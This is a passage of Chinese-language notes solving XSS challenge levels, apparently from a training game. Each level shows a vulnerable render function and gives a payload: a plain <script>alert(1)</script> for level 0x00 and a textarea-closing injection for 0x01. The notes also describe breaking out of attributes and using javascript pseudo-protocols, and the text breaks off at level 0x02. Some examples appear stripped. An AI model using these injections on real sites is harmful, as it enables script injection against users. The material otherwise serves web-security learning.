0x00
function render (input) {
return '<div>' + input + '</div>'
}
没有丝毫的过滤,且在
标签中很简单直接写payload
<script>alert(1)</script>
0x01
function render (input) {
return '<textarea>' + input + '</textarea>'
}
标签是文本框 它无法执行,但是可以闭合来执行,
XSS位置在html 标签属性中 可以先判断闭合条件 '和" 利用伪协议写js
如果是>< 标签内 可以直接写html 标签 值得注意的是有些标签自带htmlEncode功能
例
这些标签需要先闭合不然标签输出的都是文本,所以这里把前面的闭合即可
</textarea><script>alert(1)</script>
0x02
function render (input) {
return '<input type="name" value="' + input + '">